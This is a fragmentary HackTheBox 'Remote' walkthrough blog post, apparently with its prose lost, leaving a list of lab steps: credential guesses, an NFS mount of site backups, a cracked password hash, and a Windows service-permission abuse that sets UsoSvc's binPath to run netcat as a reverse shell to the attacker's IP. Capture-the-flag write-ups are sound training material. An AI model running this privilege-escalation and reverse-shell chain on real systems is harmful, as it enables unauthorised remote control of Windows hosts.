Remote HackTheBox Walkthrough

1. admin@remote.htb:admin
2. admin@remote.htb:password
3. guest@remote.htb:guest
first i made a directory called mount
sudo mount -t nfs -o vers=2 10.10.10.180/site_backups $(pwd)/mount
1. admin@htb.local
2. smith@htb.local
b8be16afba8c314ad33d812f22a04991b90e2aaa
baconandcheese
admin@htb.local:baconandcheese
Version: 7.12.4
xsltSelection
Invoke-AllChecks
sc.exe stop UsoSvc
sc.exe config usosvc binPath="C:\users\public\nc.exe 10.10.14.124 9001 -e cmd"
sc.exe start UsoSvc

--

--

--

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Mobile AppSec: Secure Storage Considerations

What is an Email Spoof and How to Spot One?

Concave: personal thoughts & some theories

Bot Transaction Analysis Report

STRENGTHENING DATA PROTECTION IN HEALTHCARE THROUGH SECURE FILE TRANSPORT- POWERED BY BOTDOC

Secure File Transport by Cloud Maven, Inc.

Going Through the Weeds with Cryptos

Netflix 的 IP Address

How safe is your office?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Musyoka Ian

Musyoka Ian

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

More from Medium

Lot-of-Logs ! San-Diego CTF.

Smag-Grotto CTF Walkthrough

Celestial Writeup

HackTheBox Pandora Write-Up